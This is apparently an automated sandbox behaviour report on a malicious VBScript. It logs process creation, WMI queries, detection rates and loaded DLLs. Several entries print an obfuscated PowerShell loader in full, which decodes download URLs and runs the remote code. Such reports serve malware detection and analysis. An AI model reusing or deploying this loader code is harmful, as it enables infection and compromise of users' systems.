Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Enspndervognes.Eks
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3568:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6488:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5768:120:WilError_03
Source: C:\Windows\SysWOW64\svchost.exe | Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4b44c99e-e2eb-c0a4be-89a68ae4061c}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cpu3fn4w.zsa.ps1
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0iTxQouy7k.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5752
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4948
Source: C:\Windows\SysWOW64\svchost.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 0iTxQouy7k.vbs | Virustotal: Detection: 16%
Source: 0iTxQouy7k.vbs | ReversingLabs: Detection: 28%
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get caption,serialnumber
Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Anhemitonic63='Unclever';;$Brescian='debauchedly';;$thunderhead='Reservationsdatoers';;$Graadens='Dogernes';;$Eksplosionsmotorernes47=$host.Name; function Resubmerging($Dagsproduktionernestjeneste){If ($Eksplosionsmotorernes47) {$Satirizers='Flippermaskiners';$Heterogenes=2;$Dagsproduktionerne=$Heterogenes}do{$laboratorieplanlgningers+=$Dagsproduktionernestjeneste[$Dagsproduktionerne];$Dagsproduktionerne+=3} until(!$Dagsproduktionernestjeneste[$Dagsproduktionerne])$laboratorieplanlgningers}function Impalement($Lucern179){ .($Raaderet113) ($Lucern179)}$Aabningshaand=Resubmerging 'Sun,reSlTSy. rw';$Aabningshaand+=Resubmerging 'BeE.lBSyCSpLKai CeShn t';$Stikkelsbrbens127=Resubmerging 'FoMAmoEtzOriFyl Pl DaRe/';$Telemetered=Resubmerging 'AtT SlGus s1 I2';$Dagsproduktionernendows='Pl[AcnP EOrtEu.Nos ae,mrUavS,iS c pEMaPS o yiDon DtB M a cn.jaMaGUnEJerlo]Ca: :SkS eeTacBlU urPiiBit AYBep ORInoM TEloTaCFao.nl B=Sc$IntMie LReeTemKuEViTP.eUdrLiEK D';$Stikkelsbrbens127+=Resubmerging 'S 5 r.,a0Sn Pe(F W MiannArdDioVswRes BeNApTA Pl1 r0Ra. e0Li; o CrWJeiUnnDi6Ne4Fo;fo PixRe6F 4R ; D F rBuv h:Lk1Hi3 T1 u.Ep0 H) S StG EeRac.ekBuo T/ 2 G0Op1 .0Fe0Sc1 O0Sq1Ne BlF Pi UrFoe fAnoAlxFr/,r1 .3B,1.i. S0';$Centas=Resubmerging ',oU s SE CrSc- Ma g deHyN UT';$morbidise=Resubmerging 'Ovh ntU tTipTrsDr:Ra/Ou/ ,w Sw NwFi. ttC dUne BjDibta.Kic so .m v/SukPopEl/HaE kpPei.il ea rc lhCrnSwa.t. ,qMuxEfdPu>.ah Pt Bttrprns a:Co/Sv/ Lw dwK.wS . fUdt AsG ePrnGigT iMon leMeeHorV sCa. 
BcUfoBrm T/KakScmWo/ OENepAuiJalHaaRicfihHonLeaAk.OlqMux Cd';$Dixenite=Resubmerging 'Sc>';$Raaderet113=Resubmerging ' ,I ePaX';$Feminologisk='Bestrr';$klerum='\Enspndervognes.Eks';Impalement (Resubmerging ' K$ sgN lIno bgiAPrl C:UnrA a ,bOvAD lGedRveRerReMTed RE.e=O,$ le ,N FV C: BAScp .pQudLraFoTprASk+b.$SpKFeLU E nRLauSeM');Impalement (Resubmerging ' S$ GC.lKoO pbUcAS lO,:DiGLaAilsMatVaR OO gm ,E nNvitoAVi=Ta$FoMO oEurUrb BIRedSpi Ssane p.PrsInP el PiSktKo( d$b d FI oXInE enC IGgTUdEUn)');Impalement (Resubmerging $Dagsproduktionernendows);$morbidise=$gastromenia[0];$Parfumens=(Resubmerging 'Lr$moG KlBiO ebUgaFiL P:P dHyEHeC ,AIlL lCScIskf DyDiIBrnNeG =LaN DEMaW -Jeo HBssJ Ce FCflTRa uSS.Yp StatUneFuMKr.H $ UAN aScbNonA.I JNH gYosN H eAL ASknT D');Impalement ($Parfumens);Impalement (Resubmerging 'C $ ADDee jc yaS,lVecT,iK.fk,y BiDdntig p.TrHaneUnaS.dH e Rr usIm[ D$ SC .e SnUntM,a.es G]I,=Bl$prSTotPaiPikvikN,e UlTrsEkbArrSvb ieCun s A1Ud2 a7');$Nonappreciative=Resubmerging 'Im$KaDPie .cFia .lIncGui,nf .yUkiAsn g.d. SD o.lwEunSulUno RaP dUlFC iInlEfeTi(Ty$ ,m EovarKabEniBrdCaisasileFl,Fr$S.S ooJak TlT e.ptAnt feUnnAn7K,6 O)';$Sokletten76=$Rabaldermde;Impalement (Resubmerging ',e$T gliL vOMaB BAAplUm: S ,T vOReS ,NTuI.xN.uG e rnL,s e=.a(PaTSneL.SsttTr-GePUra,eTCoHE D $KySMaO Hk .LIbEd tChT SEV,nra7Re6Va)');while (!$Stosningens) {Impalement (Resubmerging 'Mu$EpgShl
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Anhemitonic63='Unclever';;$Brescian='debauchedly';;$thunderhead='Reservationsdatoers';;$Graadens='Dogernes';;$Eksplosionsmotorernes47=$host.Name; function Resubmerging($Dagsproduktionernestjeneste){If ($Eksplosionsmotorernes47) {$Satirizers='Flippermaskiners';$Heterogenes=2;$Dagsproduktionerne=$Heterogenes}do{$laboratorieplanlgningers+=$Dagsproduktionernestjeneste[$Dagsproduktionerne];$Dagsproduktionerne+=3} until(!$Dagsproduktionernestjeneste[$Dagsproduktionerne])$laboratorieplanlgningers}function Impalement($Lucern179){ .($Raaderet113) ($Lucern179)}$Aabningshaand=Resubmerging 'Sun,reSlTSy. rw';$Aabningshaand+=Resubmerging 'BeE.lBSyCSpLKai CeShn t';$Stikkelsbrbens127=Resubmerging 'FoMAmoEtzOriFyl Pl DaRe/';$Telemetered=Resubmerging 'AtT SlGus s1 I2';$Dagsproduktionernendows='Pl[AcnP EOrtEu.Nos ae,mrUavS,iS c pEMaPS o yiDon DtB M a cn.jaMaGUnEJerlo]Ca: :SkS eeTacBlU urPiiBit AYBep ORInoM TEloTaCFao.nl B=Sc$IntMie LReeTemKuEViTP.eUdrLiEK D';$Stikkelsbrbens127+=Resubmerging 'S 5 r.,a0Sn Pe(F W MiannArdDioVswRes BeNApTA Pl1 r0Ra. e0Li; o CrWJeiUnnDi6Ne4Fo;fo PixRe6F 4R ; D F rBuv h:Lk1Hi3 T1 u.Ep0 H) S StG EeRac.ekBuo T/ 2 G0Op1 .0Fe0Sc1 O0Sq1Ne BlF Pi UrFoe fAnoAlxFr/,r1 .3B,1.i. S0';$Centas=Resubmerging ',oU s SE CrSc- Ma g deHyN UT';$morbidise=Resubmerging 'Ovh ntU tTipTrsDr:Ra/Ou/ ,w Sw NwFi. ttC dUne BjDibta.Kic so .m v/SukPopEl/HaE kpPei.il ea rc lhCrnSwa.t. ,qMuxEfdPu>.ah Pt Bttrprns a:Co/Sv/ Lw dwK.wS . fUdt AsG ePrnGigT iMon leMeeHorV sCa. 
BcUfoBrm T/KakScmWo/ OENepAuiJalHaaRicfihHonLeaAk.OlqMux Cd';$Dixenite=Resubmerging 'Sc>';$Raaderet113=Resubmerging ' ,I ePaX';$Feminologisk='Bestrr';$klerum='\Enspndervognes.Eks';Impalement (Resubmerging ' K$ sgN lIno bgiAPrl C:UnrA a ,bOvAD lGedRveRerReMTed RE.e=O,$ le ,N FV C: BAScp .pQudLraFoTprASk+b.$SpKFeLU E nRLauSeM');Impalement (Resubmerging ' S$ GC.lKoO pbUcAS lO,:DiGLaAilsMatVaR OO gm ,E nNvitoAVi=Ta$FoMO oEurUrb BIRedSpi Ssane p.PrsInP el PiSktKo( d$b d FI oXInE enC IGgTUdEUn)');Impalement (Resubmerging $Dagsproduktionernendows);$morbidise=$gastromenia[0];$Parfumens=(Resubmerging 'Lr$moG KlBiO ebUgaFiL P:P dHyEHeC ,AIlL lCScIskf DyDiIBrnNeG =LaN DEMaW -Jeo HBssJ Ce FCflTRa uSS.Yp StatUneFuMKr.H $ UAN aScbNonA.I JNH gYosN H eAL ASknT D');Impalement ($Parfumens);Impalement (Resubmerging 'C $ ADDee jc yaS,lVecT,iK.fk,y BiDdntig p.TrHaneUnaS.dH e Rr usIm[ D$ SC .e SnUntM,a.es G]I,=Bl$prSTotPaiPikvikN,e UlTrsEkbArrSvb ieCun s A1Ud2 a7');$Nonappreciative=Resubmerging 'Im$KaDPie .cFia .lIncGui,nf .yUkiAsn g.d. SD o.lwEunSulUno RaP dUlFC iInlEfeTi(Ty$ ,m EovarKabEniBrdCaisasileFl,Fr$S.S ooJak TlT e.ptAnt feUnnAn7K,6 O)';$Sokletten76=$Rabaldermde;Impalement (Resubmerging ',e$T gliL vOMaB BAAplUm: S ,T vOReS ,NTuI.xN.uG e rnL,s e=.a(PaTSneL.SsttTr-GePUra,eTCoHE D $KySMaO Hk .LIbEd tChT SEV,nra7Re6Va)');while (!$Stosningens) {Impalement (Resubmerging 'Mu$EpgShl
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get caption,serialnumberJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Anhemitonic63='Unclever';;$Brescian='debauchedly';;$thunderhead='Reservationsdatoers';;$Graadens='Dogernes';;$Eksplosionsmotorernes47=$host.Name; function Resubmerging($Dagsproduktionernestjeneste){If ($Eksplosionsmotorernes47) {$Satirizers='Flippermaskiners';$Heterogenes=2;$Dagsproduktionerne=$Heterogenes}do{$laboratorieplanlgningers+=$Dagsproduktionernestjeneste[$Dagsproduktionerne];$Dagsproduktionerne+=3} until(!$Dagsproduktionernestjeneste[$Dagsproduktionerne])$laboratorieplanlgningers}function Impalement($Lucern179){ .($Raaderet113) ($Lucern179)}$Aabningshaand=Resubmerging 'Sun,reSlTSy. rw';$Aabningshaand+=Resubmerging 'BeE.lBSyCSpLKai CeShn t';$Stikkelsbrbens127=Resubmerging 'FoMAmoEtzOriFyl Pl DaRe/';$Telemetered=Resubmerging 'AtT SlGus s1 I2';$Dagsproduktionernendows='Pl[AcnP EOrtEu.Nos ae,mrUavS,iS c pEMaPS o yiDon DtB M a cn.jaMaGUnEJerlo]Ca: :SkS eeTacBlU urPiiBit AYBep ORInoM TEloTaCFao.nl B=Sc$IntMie LReeTemKuEViTP.eUdrLiEK D';$Stikkelsbrbens127+=Resubmerging 'S 5 r.,a0Sn Pe(F W MiannArdDioVswRes BeNApTA Pl1 r0Ra. e0Li; o CrWJeiUnnDi6Ne4Fo;fo PixRe6F 4R ; D F rBuv h:Lk1Hi3 T1 u.Ep0 H) S StG EeRac.ekBuo T/ 2 G0Op1 .0Fe0Sc1 O0Sq1Ne BlF Pi UrFoe fAnoAlxFr/,r1 .3B,1.i. S0';$Centas=Resubmerging ',oU s SE CrSc- Ma g deHyN UT';$morbidise=Resubmerging 'Ovh ntU tTipTrsDr:Ra/Ou/ ,w Sw NwFi. ttC dUne BjDibta.Kic so .m v/SukPopEl/HaE kpPei.il ea rc lhCrnSwa.t. ,qMuxEfdPu>.ah Pt Bttrprns a:Co/Sv/ Lw dwK.wS . fUdt AsG ePrnGigT iMon leMeeHorV sCa. 
BcUfoBrm T/KakScmWo/ OENepAuiJalHaaRicfihHonLeaAk.OlqMux Cd';$Dixenite=Resubmerging 'Sc>';$Raaderet113=Resubmerging ' ,I ePaX';$Feminologisk='Bestrr';$klerum='\Enspndervognes.Eks';Impalement (Resubmerging ' K$ sgN lIno bgiAPrl C:UnrA a ,bOvAD lGedRveRerReMTed RE.e=O,$ le ,N FV C: BAScp .pQudLraFoTprASk+b.$SpKFeLU E nRLauSeM');Impalement (Resubmerging ' S$ GC.lKoO pbUcAS lO,:DiGLaAilsMatVaR OO gm ,E nNvitoAVi=Ta$FoMO oEurUrb BIRedSpi Ssane p.PrsInP el PiSktKo( d$b d FI oXInE enC IGgTUdEUn)');Impalement (Resubmerging $Dagsproduktionernendows);$morbidise=$gastromenia[0];$Parfumens=(Resubmerging 'Lr$moG KlBiO ebUgaFiL P:P dHyEHeC ,AIlL lCScIskf DyDiIBrnNeG =LaN DEMaW -Jeo HBssJ Ce FCflTRa uSS.Yp StatUneFuMKr.H $ UAN aScbNonA.I JNH gYosN H eAL ASknT D');Impalement ($Parfumens);Impalement (Resubmerging 'C $ ADDee jc yaS,lVecT,iK.fk,y BiDdntig p.TrHaneUnaS.dH e Rr usIm[ D$ SC .e SnUntM,a.es G]I,=Bl$prSTotPaiPikvikN,e UlTrsEkbArrSvb ieCun s A1Ud2 a7');$Nonappreciative=Resubmerging 'Im$KaDPie .cFia .lIncGui,nf .yUkiAsn g.d. SD o.lwEunSulUno RaP dUlFC iInlEfeTi(Ty$ ,m EovarKabEniBrdCaisasileFl,Fr$S.S ooJak TlT e.ptAnt feUnnAn7K,6 O)';$Sokletten76=$Rabaldermde;Impalement (Resubmerging ',e$T gliL vOMaB BAAplUm: S ,T vOReS ,NTuI.xN.uG e rnL,s e=.a(PaTSneL.SsttTr-GePUra,eTCoHE D $KySMaO Hk .LIbEd tChT SEV,nra7Re6Va)');while (!$Stosningens) {Impalement (Resubmerging 'Mu$EpgShlJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptnet.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\wscript.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iertutil.dll
